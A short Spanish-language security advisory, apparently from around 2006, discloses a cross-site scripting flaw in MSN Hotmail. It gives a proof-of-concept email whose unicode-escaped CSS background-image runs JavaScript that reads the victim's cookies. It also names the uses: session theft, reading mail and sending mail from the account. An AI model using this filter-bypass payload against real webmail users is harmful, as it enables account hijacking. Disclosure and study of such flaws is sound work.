MSN Hotmail : Vulnerabilidad Cross-Site Scripting

El motor de filtración de Hotmail es insuficiente para filtrar Javascript. Es posible escribir Javascript en el atributo de BGCOLOR de la etiqueta de BODY, usando CSS. Esto conduce a la ejecución del script cuando se ve el email.
El Javascript debe ser unicode codificado para engañar el filtro. Esta codificación se reconoce con IE > = 6.

Prueba de Concepto:

Cuando un usuario envia un mail de la siguiente forma:

html>
body bgcolor="#CCCCCC; background-image:
url\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\0064\006f\0063\0075\006d\0065\006e\0074\002e\0063\006f\006f\006b\0069\0065\0029'\0029">
p>By http://www.mousehack.blogspot.com !!!/p> /body /html

La victima recibe el mail de la siguiente forma:

div>
style="background-color:#CCCCCC;background-image:url\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028\0064\006f\0063\0075\006d\0065\006e\0074\002e\0063\006f\006f\006b\0069\0065\0029'\0029">
p>By http://www.mousehack.blogspot.com !!!/p> /div

Esta vulnerabilidad se puede utilizar para modificar la configuracion del webmail, para recolectar las cookies de la víctima, y para robar su sesión. Uno puede descargar los email de toda la víctima y las entradas del libro de dirección y enviar email de la cuenta robada.

Creditos:
http://www.nuitduhack.com/accueil_en-nuit-du-hack-2006.htm